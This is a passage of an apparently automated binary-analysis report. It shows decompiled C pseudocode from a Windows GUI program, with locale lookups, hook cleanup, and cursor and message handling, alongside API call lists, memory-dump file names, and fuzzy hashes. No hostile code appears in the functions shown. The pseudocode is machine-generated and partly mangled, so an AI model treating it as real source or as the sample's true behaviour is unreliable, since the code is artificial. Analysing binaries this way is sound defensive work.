				_push(E00409CFA);
				return E00404348( &_v8);
			}










                                                                        0x00409c5c
                                                                        0x00409c5f
                                                                        0x00409c64
                                                                        0x00409c65
                                                                        0x00409c6a
                                                                        0x00409c6d
                                                                        0x00409c83
                                                                        0x00409c95
                                                                        0x00409c9f
                                                                        0x00409caf
                                                                        0x00409cb4
                                                                        0x00409cb9
                                                                        0x00409cbe
                                                                        0x00409cbe
                                                                        0x00409cc4
                                                                        0x00409cc7
                                                                        0x00409cc7
                                                                        0x00409cd8
                                                                        0x00409cd8
                                                                        0x00409cdf
                                                                        0x00409ce2
                                                                        0x00409ce5
                                                                        0x00409cf2

                                                                        APIs
                                                                        • GetThreadLocale.KERNEL32(?,00000000,00409CF3,?,?,00000000), ref: 00409C74
                                                                          • Part of subcall function 004099D4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 004099F2
                                                                        • GetThreadLocale.KERNEL32(00000000,00000004,00000000,00409CF3,?,?,00000000), ref: 00409CA4
                                                                        • EnumCalendarInfoA.KERNEL32(Function_00009BA8,00000000,00000000,00000004), ref: 00409CAF
                                                                        • GetThreadLocale.KERNEL32(00000000,00000003,00000000,00409CF3,?,?,00000000), ref: 00409CCD
                                                                        • EnumCalendarInfoA.KERNEL32(Function_00009BE4,00000000,00000000,00000003), ref: 00409CD8
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Locale$InfoThread$CalendarEnum
                                                                        • String ID:
                                                                        • API String ID: 4102113445-0
                                                                        • Opcode ID: 790f7a62ba9bfdb9f10ecce0afa5b16d7d82922cee3855c682fc3fe35e3b7d87
                                                                        • Instruction ID: d1406e9af6801d42e4c1d76f03b95420f91cc8fef24ea995857c9060e22c89c4
                                                                        • Opcode Fuzzy Hash: 790f7a62ba9bfdb9f10ecce0afa5b16d7d82922cee3855c682fc3fe35e3b7d87
                                                                        • Instruction Fuzzy Hash: 6401F7716046046EE701B7759D13FAA719CDF41B28F224137F801B7AC2D63C9E0086AC
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00454F68, Relevance: 7.5, APIs: 5, Instructions: 25synchronizationthreadCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00454F68() {
				void* _t2;
				void* _t5;
				void* _t8;
				struct HHOOK__* _t10;

				if( *0x496c1c != 0) {
					_t10 =  *0x496c1c; // 0x0
					UnhookWindowsHookEx(_t10);
				}
				 *0x496c1c = 0;
				if( *0x496c20 != 0) {
					_t2 =  *0x496c18; // 0x0
					SetEvent(_t2);
					if(GetCurrentThreadId() !=  *0x496c14) {
						_t8 =  *0x496c20; // 0x0
						WaitForSingleObject(_t8, 0xffffffff);
					}
					_t5 =  *0x496c20; // 0x0
					CloseHandle(_t5);
					 *0x496c20 = 0;
					return 0;
				}
				return 0;
			}







                                                                        0x00454f6f
                                                                        0x00454f71
                                                                        0x00454f77
                                                                        0x00454f77
                                                                        0x00454f7e
                                                                        0x00454f8a
                                                                        0x00454f8c
                                                                        0x00454f92
                                                                        0x00454fa2
                                                                        0x00454fa6
                                                                        0x00454fac
                                                                        0x00454fac
                                                                        0x00454fb1
                                                                        0x00454fb7
                                                                        0x00454fbe
                                                                        0x00000000
                                                                        0x00454fbe
                                                                        0x00454fc3

                                                                        APIs
                                                                        • UnhookWindowsHookEx.USER32(00000000), ref: 00454F77
                                                                        • SetEvent.KERNEL32(00000000,00457212,00000000,004562EF,?,?,004798C4,00000001,004563AF,?,?,?,004798C4), ref: 00454F92
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00454F97
                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00457212,00000000,004562EF,?,?,004798C4,00000001,004563AF,?,?,?,004798C4), ref: 00454FAC
                                                                        • CloseHandle.KERNEL32(00000000,00000000,00457212,00000000,004562EF,?,?,004798C4,00000001,004563AF,?,?,?,004798C4), ref: 00454FB7
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
                                                                        • String ID:
                                                                        • API String ID: 2429646606-0
                                                                        • Opcode ID: f342eaf5d6d82dadfeef3d3fe6df92537fcd3f42866fbe39511197cf40211446
                                                                        • Instruction ID: 98b08e2d4b11bd526172336b730c09841e2ca8282cf2238b0d719a92ae855655
                                                                        • Opcode Fuzzy Hash: f342eaf5d6d82dadfeef3d3fe6df92537fcd3f42866fbe39511197cf40211446
                                                                        • Instruction Fuzzy Hash: C1F01C716041009AC710FBBDDD85E1536E4E718349B03493BB581E71A5CB3DD480CF1C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004573E0, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 289COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 86%
                                                                        			E004573E0(char __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct tagPOINT _v32;
				char _v33;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				struct HWND__* _v52;
				intOrPtr _v56;
				char _v60;
				struct tagRECT _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				int _v88;
				int _v92;
				intOrPtr _v96;
				char _v100;
				struct tagRECT _v116;
				char _v132;
				intOrPtr _v136;
				char _v140;
				char _v144;
				char _v148;
				struct HWND__* _t135;
				struct HWND__* _t171;
				intOrPtr _t193;
				char _t199;
				intOrPtr _t223;
				intOrPtr _t227;
				intOrPtr* _t262;
				intOrPtr _t281;
				intOrPtr _t282;
				intOrPtr _t284;
				intOrPtr _t290;
				intOrPtr* _t319;
				intOrPtr _t320;
				void* _t327;

				_t326 = _t327;
				_v144 = 0;
				_v148 = 0;
				asm("movsd");
				asm("movsd");
				_v8 = __eax;
				_t281 =  *0x44d464; // 0x44d468
				E00404D24( &_v100, _t281);
				_t262 =  &_v8;
				_push(_t327);
				_push(0x45778b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t327 + 0xffffff70;
				 *((char*)( *_t262 + 0x58)) = 0;
				if( *((char*)( *_t262 + 0x88)) == 0 ||  *((intOrPtr*)( *_t262 + 0x60)) == 0 || E0044D81C() == 0 || E00454DE0(E00434E58( &_v16, 1)) !=  *((intOrPtr*)( *_t262 + 0x60))) {
					L23:
					_t135 = _v52;
					__eflags = _t135;
					if(_t135 <= 0) {
						E004571F4( *_t262);
					} else {
						E00456FFC( *_t262, 0, _t135);
					}
					goto L26;
				} else {
					_v100 =  *((intOrPtr*)( *_t262 + 0x60));
					_v92 = _v16;
					_v88 = _v12;
					_v88 = _v88 + E0045722C();
					_v84 = E004541A4();
					_v80 =  *((intOrPtr*)( *_t262 + 0x5c));
					E00435F4C( *((intOrPtr*)( *_t262 + 0x60)),  &_v132);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x60)))) + 0x40))();
					_v32.x = 0;
					_v32.y = 0;
					_t319 =  *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x60)) + 0x30));
					_t333 = _t319;
					if(_t319 == 0) {
						_t320 =  *((intOrPtr*)( *_t262 + 0x60));
						_t290 =  *0x4323f0; // 0x43243c
						_t171 = E00403768(_t320, _t290);
						__eflags = _t171;
						if(_t171 != 0) {
							__eflags =  *(_t320 + 0x190);
							if( *(_t320 + 0x190) != 0) {
								ClientToScreen( *(_t320 + 0x190),  &_v32);
							}
						}
					} else {
						 *((intOrPtr*)( *_t319 + 0x40))();
					}
					OffsetRect( &_v76, _v32.x - _v24, _v32.y - _v20);
					E004360F0( *((intOrPtr*)( *_t262 + 0x60)),  &_v140,  &_v16);
					_v60 = _v140;
					_v56 = _v136;
					E00454DA8( *((intOrPtr*)( *_t262 + 0x60)),  &_v148);
					E004336E0(_v148,  &_v140,  &_v144, _t333);
					E004043E0( &_v44, _v144);
					_v52 = 0;
					_v48 =  *((intOrPtr*)( *_t262 + 0x74));
					_t193 =  *0x47aaf0; // 0x432a84
					_v96 = _t193;
					_v40 = 0;
					_v33 = E00437760( *((intOrPtr*)( *_t262 + 0x60)), 0, 0xb030,  &_v100) == 0;
					if(_v33 != 0 &&  *((short*)( *_t262 + 0x11a)) != 0) {
						 *((intOrPtr*)( *_t262 + 0x118))( &_v100);
					}
					if(_v33 == 0 ||  *((intOrPtr*)( *_t262 + 0x60)) == 0) {
						_t199 = 0;
					} else {
						_t199 = 1;
					}
					_t296 =  *_t262;
					 *((char*)( *_t262 + 0x58)) = _t199;
					if( *((char*)( *_t262 + 0x58)) == 0) {
						goto L23;
					} else {
						_t340 = _v44;
						if(_v44 == 0) {
							goto L23;
						}
						E00457380(_v96, _t296, _t326);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)))) + 0x70))();
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)))) + 0xd4))( &_v116, _v40);
						OffsetRect( &_v116, _v92, _v88);
						if(E004037D8( *((intOrPtr*)( *_t262 + 0x84)), _t340) != 0) {
							_v116.left = _v116.left - E0042056C( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)) + 0x208)), _v44) + 5;
							_v116.right = _v116.right - E0042056C( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)) + 0x208)), _v44) + 5;
						}
						E004360C4( *((intOrPtr*)( *_t262 + 0x60)),  &_v140,  &_v76);
						_t223 =  *_t262;
						 *((intOrPtr*)(_t223 + 0x64)) = _v140;
						 *((intOrPtr*)(_t223 + 0x68)) = _v136;
						E004360C4( *((intOrPtr*)( *_t262 + 0x60)),  &_v140,  &(_v76.right));
						_t227 =  *_t262;
						 *((intOrPtr*)(_t227 + 0x6c)) = _v140;
						 *((intOrPtr*)(_t227 + 0x70)) = _v136;
						E0043674C( *((intOrPtr*)( *_t262 + 0x84)), _v80);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)))) + 0xd0))(_v40);
						E00454EF4(_v44);
						_t236 = _v52;
						if(_v52 <= 0) {
							E00456FFC( *_t262, 1, _v48);
						} else {
							E00456FFC( *_t262, 0, _t236);
						}
						L26:
						_pop(_t282);
						 *[fs:eax] = _t282;
						_push(0x457792);
						E0040436C( &_v148, 2);
						_t284 =  *0x44d464; // 0x44d468
						return E00404DF4( &_v100, _t284);
					}
				}
			}











































                                                                        0x004573e1
                                                                        0x004573ee
                                                                        0x004573f4
                                                                        0x004573ff
                                                                        0x00457400
                                                                        0x00457401
                                                                        0x00457407
                                                                        0x0045740d
                                                                        0x00457412
                                                                        0x00457417
                                                                        0x00457418
                                                                        0x0045741d
                                                                        0x00457420
                                                                        0x00457425
                                                                        0x00457432
                                                                        0x00457744
                                                                        0x00457744
                                                                        0x00457747
                                                                        0x00457749
                                                                        0x0045775a
                                                                        0x0045774b
                                                                        0x00457751
                                                                        0x00457751
                                                                        0x00000000
                                                                        0x0045746b
                                                                        0x00457470
                                                                        0x00457476
                                                                        0x0045747c
                                                                        0x00457484
                                                                        0x00457491
                                                                        0x00457499
                                                                        0x004574a4
                                                                        0x004574af
                                                                        0x004574b0
                                                                        0x004574b1
                                                                        0x004574b2
                                                                        0x004574bd
                                                                        0x004574c2
                                                                        0x004574c7
                                                                        0x004574cf
                                                                        0x004574d2
                                                                        0x004574d4
                                                                        0x004574e4
                                                                        0x004574e9
                                                                        0x004574ef
                                                                        0x004574f4
                                                                        0x004574f6
                                                                        0x004574f8
                                                                        0x004574ff
                                                                        0x0045750c
                                                                        0x0045750c
                                                                        0x004574ff
                                                                        0x004574d6
                                                                        0x004574dd
                                                                        0x004574dd
                                                                        0x00457523
                                                                        0x00457536
                                                                        0x00457541
                                                                        0x0045754a
                                                                        0x00457558
                                                                        0x00457569
                                                                        0x00457577
                                                                        0x0045757e
                                                                        0x00457586
                                                                        0x00457589
                                                                        0x0045758e
                                                                        0x00457593
                                                                        0x004575ad
                                                                        0x004575b5
                                                                        0x004575d5
                                                                        0x004575d5
                                                                        0x004575df
                                                                        0x004575e9
                                                                        0x004575ed
                                                                        0x004575ed
                                                                        0x004575ed
                                                                        0x004575ef
                                                                        0x004575f1
                                                                        0x004575fa
                                                                        0x00000000
                                                                        0x00457600
                                                                        0x00457600
                                                                        0x00457604
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0045760e
                                                                        0x00457626
                                                                        0x00457641
                                                                        0x00457653
                                                                        0x0045766b
                                                                        0x00457686
                                                                        0x004576a2
                                                                        0x004576a2
                                                                        0x004576b3
                                                                        0x004576b8
                                                                        0x004576c0
                                                                        0x004576c9
                                                                        0x004576da
                                                                        0x004576df
                                                                        0x004576e7
                                                                        0x004576f0
                                                                        0x004576fe
                                                                        0x00457717
                                                                        0x0045771d
                                                                        0x00457722
                                                                        0x00457727
                                                                        0x0045773d
                                                                        0x00457729
                                                                        0x0045772f
                                                                        0x0045772f
                                                                        0x0045775f
                                                                        0x00457761
                                                                        0x00457764
                                                                        0x00457767
                                                                        0x00457777
                                                                        0x0045777f
                                                                        0x0045778a
                                                                        0x0045778a
                                                                        0x004575fa

                                                                        APIs
                                                                          • Part of subcall function 0044D81C: GetActiveWindow.USER32 ref: 0044D81F
                                                                          • Part of subcall function 0044D81C: GetCurrentThreadId.KERNEL32 ref: 0044D834
                                                                          • Part of subcall function 0044D81C: EnumThreadWindows.USER32(00000000,0044D7FC), ref: 0044D83A
                                                                          • Part of subcall function 0045722C: GetCursor.USER32(?), ref: 00457247
                                                                          • Part of subcall function 0045722C: GetIconInfo.USER32(00000000,?), ref: 0045724D
                                                                        • ClientToScreen.USER32(?,?), ref: 0045750C
                                                                        • OffsetRect.USER32(?,?,?), ref: 00457523
                                                                        • OffsetRect.USER32(?,?,?), ref: 00457653
                                                                          • Part of subcall function 00456FFC: SetTimer.USER32(00000000,00000000,?,00454E00), ref: 00457016
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: OffsetRectThread$ActiveClientCurrentCursorEnumIconInfoScreenTimerWindowWindows
                                                                        • String ID: <$C
                                                                        • API String ID: 2591747986-3423417450
                                                                        • Opcode ID: 00bf1ddf5426e94dbb9774d478e7e55c612c9b43fdf6370cf5323fbe8e4eb597
                                                                        • Instruction ID: 30bf7d25c4205cc9a04f9c4c997c4720ffd439aca70f5178930e4931d0ecf433
                                                                        • Opcode Fuzzy Hash: 00bf1ddf5426e94dbb9774d478e7e55c612c9b43fdf6370cf5323fbe8e4eb597
                                                                        • Instruction Fuzzy Hash: C9D1F575A00618CFCB00DFA8D884A9EB7F5BF49304F1580AAE904EB366DB34AD49CF55
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00440F1C, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 287COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 89%
                                                                        			E00440F1C(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi, void* __fp0) {
				intOrPtr* _v8;
				struct tagPOINT _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				struct tagMSG _v64;
				intOrPtr _v68;
				long _v72;
				char _v76;
				intOrPtr _t125;
				int _t126;
				int _t140;
				int _t147;
				intOrPtr* _t175;
				int _t186;
				void* _t191;
				intOrPtr* _t209;
				void* _t213;
				intOrPtr _t214;
				intOrPtr _t219;
				int _t232;
				intOrPtr _t233;
				int _t236;
				intOrPtr* _t242;
				intOrPtr _t262;
				intOrPtr _t278;
				intOrPtr _t289;
				int _t297;
				int _t300;
				int _t302;
				int _t303;
				int _t304;
				void* _t307;
				void* _t309;
				void* _t315;

				_t315 = __fp0;
				_t306 = _t307;
				_push(__edi);
				_v76 = 0;
				_t242 = __edx;
				_v8 = __eax;
				_push(_t307);
				_push(0x4412f4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t307 + 0xffffffb8;
				_t125 =  *__edx;
				_t309 = _t125 - 0x202;
				if(_t309 > 0) {
					_t126 = _t125 - 0x203;
					__eflags = _t126;
					if(__eflags == 0) {
						E00407314( *((intOrPtr*)(__edx + 8)), 0,  &_v72);
						_t297 = E0043F9A8(_v8,  &_v20,  &_v72, __eflags);
						__eflags = _t297;
						if(_t297 != 0) {
							__eflags =  *(_t297 + 4);
							if( *(_t297 + 4) != 0) {
								__eflags = _v20 - 2;
								if(_v20 == 2) {
									E00434E0C();
									E004372AC( *(_t297 + 4), 0, 0, 1);
								}
							}
						}
						L47:
						if( *((short*)(_v8 + 0x32)) != 0) {
							 *((intOrPtr*)(_v8 + 0x30))();
						}
						L49:
						_pop(_t262);
						 *[fs:eax] = _t262;
						_push(0x4412fb);
						return E00404348( &_v76);
					}
					_t140 = _t126 - 0xae2d;
					__eflags = _t140;
					if(_t140 == 0) {
						 *((intOrPtr*)(_v8 + 0x30))();
						__eflags =  *(__edx + 0xc);
						if( *(__edx + 0xc) != 0) {
							goto L49;
						}
						_t300 =  *((intOrPtr*)( *_v8 + 4))();
						__eflags = _v20 - 0x12;
						if(_v20 != 0x12) {
							__eflags = _t300;
							if(_t300 == 0) {
								goto L49;
							}
							_t147 = _v20 - 2;
							__eflags = _t147;
							if(_t147 == 0) {
								L46:
								E00435F4C(_t300,  &_v36);
								 *((intOrPtr*)( *_v8))();
								_v36 = _v36 - _v36 -  *((intOrPtr*)(_t300 + 0x40)) + _v36 -  *((intOrPtr*)(_t300 + 0x40));
								_v32 = _v32 - _v32 -  *((intOrPtr*)(_t300 + 0x44)) + _v32 -  *((intOrPtr*)(_t300 + 0x44));
								_v28 = _v28 -  *((intOrPtr*)(_t300 + 0x48)) - _v28 - _v36 +  *((intOrPtr*)(_t300 + 0x48)) - _v28 - _v36;
								_v24 = _v24 -  *((intOrPtr*)(_t300 + 0x4c)) - _v24 - _v32 +  *((intOrPtr*)(_t300 + 0x4c)) - _v24 - _v32;
								E004365AC(_t300,  &_v76);
								E0040439C( *((intOrPtr*)(_t242 + 8)) + 0x38, _v76);
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								goto L49;
							}
							__eflags = _t147 != 0x12;
							if(_t147 != 0x12) {
								goto L49;
							}
							goto L46;
						}
						E00404348( *((intOrPtr*)(__edx + 8)) + 0x38);
						goto L49;
					} else {
						__eflags = _t140 == 0x12;
						if(_t140 == 0x12) {
							_t175 =  *((intOrPtr*)(__edx + 8));
							__eflags =  *_t175 - 0xb00b;
							if( *_t175 == 0xb00b) {
								E00440E00(_v8,  *((intOrPtr*)(_t175 + 4)),  *((intOrPtr*)(__edx + 4)), __edi);
							}
						}
						goto L47;
					}
				}
				if(_t309 == 0) {
					__eflags =  *(_v8 + 0x60);
					if(__eflags != 0) {
						E0044094C(_v8, __eflags);
					} else {
						E00407314( *((intOrPtr*)(__edx + 8)), 0,  &_v16);
						_t302 = E0043F9A8(_v8,  &_v20,  &_v16, __eflags);
						__eflags = _t302;
						if(_t302 != 0) {
							__eflags = _v20 - 0x14;
							if(_v20 == 0x14) {
								_t295 =  *((intOrPtr*)(_t302 + 4));
								_t278 =  *0x44c130; // 0x44c17c
								_t186 = E00403768( *((intOrPtr*)(_t302 + 4)), _t278);
								__eflags = _t186;
								if(_t186 == 0) {
									E004364CC(_t295, 0);
								} else {
									E00453004(_t295,  &_v20);
								}
							}
						}
					}
					goto L47;
				}
				_t191 = _t125 - 0x20;
				if(_t191 == 0) {
					GetCursorPos( &_v16);
					E004360F0( *((intOrPtr*)(_v8 + 0x14)),  &_v72,  &_v16);
					_v16.x = _v72;
					_v16.y = _v68;
					__eflags =  *((short*)(_t242 + 8)) - 1;
					if( *((short*)(_t242 + 8)) != 1) {
						goto L47;
					}
					__eflags = E0043CC2C( *((intOrPtr*)(_v8 + 0x14))) -  *((intOrPtr*)(_t242 + 4));
					if(__eflags != 0) {
						goto L47;
					}
					__eflags = E0043B7C0( *((intOrPtr*)(_v8 + 0x14)),  &_v72, __eflags);
					if(__eflags <= 0) {
						goto L47;
					}
					_t303 = E0043F9A8(_v8,  &_v20,  &_v16, __eflags);
					__eflags = _t303;
					if(_t303 == 0) {
						goto L47;
					}
					__eflags = _v20 - 0x12;
					if(_v20 != 0x12) {
						goto L47;
					}
					_t209 =  *0x495c2c; // 0x496c08
					SetCursor(E0045469C( *_t209,  *((short*)(0x47a9d0 + ( *( *((intOrPtr*)(_t303 + 0x14)) + 0x10) & 0x000000ff) * 2))));
					 *((intOrPtr*)(_t242 + 0xc)) = 1;
					goto L49;
				}
				_t213 = _t191 - 0x1e0;
				if(_t213 == 0) {
					_t214 = _v8;
					__eflags =  *(_t214 + 0x60);
					if( *(_t214 + 0x60) != 0) {
						E00440A00(_v8);
						E00407314( *((intOrPtr*)(_t242 + 8)), 0,  &_v72);
						_t219 = _v8;
						 *(_t219 + 0x50) = _v72;
						 *((intOrPtr*)(_t219 + 0x54)) = _v68;
						E00440E88(_t306);
						E00440A00(_v8);
					}
					goto L47;
				}
				if(_t213 == 1) {
					E00407314( *((intOrPtr*)(__edx + 8)), 0,  &_v16);
					_t256 =  &_v20;
					_t304 = E0043F9A8(_v8,  &_v20,  &_v16, __eflags);
					__eflags = _t304;
					if(_t304 == 0) {
						goto L47;
					}
					__eflags = _v20 - 0x12;
					if(__eflags != 0) {
						__eflags = _v20 - 2;
						if(_v20 != 2) {
							goto L47;
						}
						_t232 = PeekMessageA( &_v64, E0043CC2C( *((intOrPtr*)(_v8 + 0x14))), 0x203, 0x203, 0);
						__eflags = _t232;
						if(_t232 == 0) {
							_t289 =  *0x4323f0; // 0x43243c
							_t236 = E00403768( *((intOrPtr*)(_t304 + 4)), _t289);
							__eflags = _t236;
							if(_t236 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t304 + 4)))) + 0xc0))();
							}
						}
						_t233 =  *((intOrPtr*)(_t304 + 4));
						__eflags =  *((char*)(_t233 + 0x9b)) - 1;
						if( *((char*)(_t233 + 0x9b)) == 1) {
							__eflags =  *((char*)(_t233 + 0x5d)) - 1;
							if( *((char*)(_t233 + 0x5d)) == 1) {
								E00436C54(_t233, _t256 | 0xffffffff, 0, _t306, _t315);
							}
						}
						goto L49;
					}
					E004408EC(_v8,  &_v16, _t304, __eflags);
				} else {
				}
			}








































                                                                        0x00440f1c
                                                                        0x00440f1d
                                                                        0x00440f24
                                                                        0x00440f27
                                                                        0x00440f2a
                                                                        0x00440f2c
                                                                        0x00440f31
                                                                        0x00440f32
                                                                        0x00440f37
                                                                        0x00440f3a
                                                                        0x00440f3d
                                                                        0x00440f3f
                                                                        0x00440f44
                                                                        0x00440f68
                                                                        0x00440f68
                                                                        0x00440f6d
                                                                        0x00440fee
                                                                        0x00441001
                                                                        0x00441003
                                                                        0x00441005
                                                                        0x0044100b
                                                                        0x0044100f
                                                                        0x00441015
                                                                        0x00441019
                                                                        0x0044101f
                                                                        0x0044102d
                                                                        0x0044102d
                                                                        0x00441019
                                                                        0x0044100f
                                                                        0x004412c9
                                                                        0x004412d1
                                                                        0x004412db
                                                                        0x004412db
                                                                        0x004412de
                                                                        0x004412e0
                                                                        0x004412e3
                                                                        0x004412e6
                                                                        0x004412f3
                                                                        0x004412f3
                                                                        0x00440f6f
                                                                        0x00440f6f
                                                                        0x00440f74
                                                                        0x00441207
                                                                        0x0044120a
                                                                        0x0044120e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00441225
                                                                        0x00441227
                                                                        0x0044122b
                                                                        0x0044123d
                                                                        0x0044123f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00441248
                                                                        0x00441248
                                                                        0x0044124b
                                                                        0x00441256
                                                                        0x0044125b
                                                                        0x0044126a
                                                                        0x00441274
                                                                        0x0044127f
                                                                        0x0044128f
                                                                        0x0044129f
                                                                        0x004412a7
                                                                        0x004412b5
                                                                        0x004412c3
                                                                        0x004412c4
                                                                        0x004412c5
                                                                        0x004412c6
                                                                        0x00000000
                                                                        0x004412c6
                                                                        0x0044124d
                                                                        0x00441250
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00441250
                                                                        0x00441233
                                                                        0x00000000
                                                                        0x00440f7a
                                                                        0x00440f7a
                                                                        0x00440f7d
                                                                        0x00440f83
                                                                        0x00440f86
                                                                        0x00440f8c
                                                                        0x00440f9b
                                                                        0x00440f9b
                                                                        0x00440f8c
                                                                        0x00000000
                                                                        0x00440f7d
                                                                        0x00440f74
                                                                        0x00440f46
                                                                        0x004410ea
                                                                        0x004410ee
                                                                        0x0044114e
                                                                        0x004410f0
                                                                        0x004410f6
                                                                        0x00441109
                                                                        0x0044110b
                                                                        0x0044110d
                                                                        0x00441113
                                                                        0x00441117
                                                                        0x0044111d
                                                                        0x00441122
                                                                        0x00441128
                                                                        0x0044112d
                                                                        0x0044112f
                                                                        0x00441141
                                                                        0x00441131
                                                                        0x00441133
                                                                        0x00441133
                                                                        0x0044112f
                                                                        0x00441117
                                                                        0x0044110d
                                                                        0x00000000
                                                                        0x004410ee
                                                                        0x00440f4c
                                                                        0x00440f4f
                                                                        0x0044115c
                                                                        0x0044116d
                                                                        0x00441175
                                                                        0x0044117b
                                                                        0x0044117e
                                                                        0x00441183
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00441194
                                                                        0x00441197
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004411a8
                                                                        0x004411aa
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004411be
                                                                        0x004411c0
                                                                        0x004411c2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004411c8
                                                                        0x004411cc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004411e1
                                                                        0x004411ee
                                                                        0x004411f3
                                                                        0x00000000
                                                                        0x004411f3
                                                                        0x00440f55
                                                                        0x00440f5a
                                                                        0x00440fa5
                                                                        0x00440fa8
                                                                        0x00440fac
                                                                        0x00440fb5
                                                                        0x00440fc0
                                                                        0x00440fc5
                                                                        0x00440fcb
                                                                        0x00440fd1
                                                                        0x00440fd5
                                                                        0x00440fde
                                                                        0x00440fde
                                                                        0x00000000
                                                                        0x00440fac
                                                                        0x00440f5d
                                                                        0x0044103d
                                                                        0x00441042
                                                                        0x00441050
                                                                        0x00441052
                                                                        0x00441054
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0044105a
                                                                        0x0044105e
                                                                        0x00441072
                                                                        0x00441076
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00441098
                                                                        0x0044109d
                                                                        0x0044109f
                                                                        0x004410a4
                                                                        0x004410aa
                                                                        0x004410af
                                                                        0x004410b1
                                                                        0x004410b8
                                                                        0x004410b8
                                                                        0x004410b1
                                                                        0x004410be
                                                                        0x004410c1
                                                                        0x004410c8
                                                                        0x004410ce
                                                                        0x004410d2
                                                                        0x004410dd
                                                                        0x004410dd
                                                                        0x004410d2
                                                                        0x00000000
                                                                        0x004410c8
                                                                        0x00441068
                                                                        0x00000000
                                                                        0x00440f63

                                                                        APIs
                                                                        • GetCursorPos.USER32(?), ref: 0044115C
                                                                        • SetCursor.USER32(00000000,?,00000000,004412F4), ref: 004411EE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
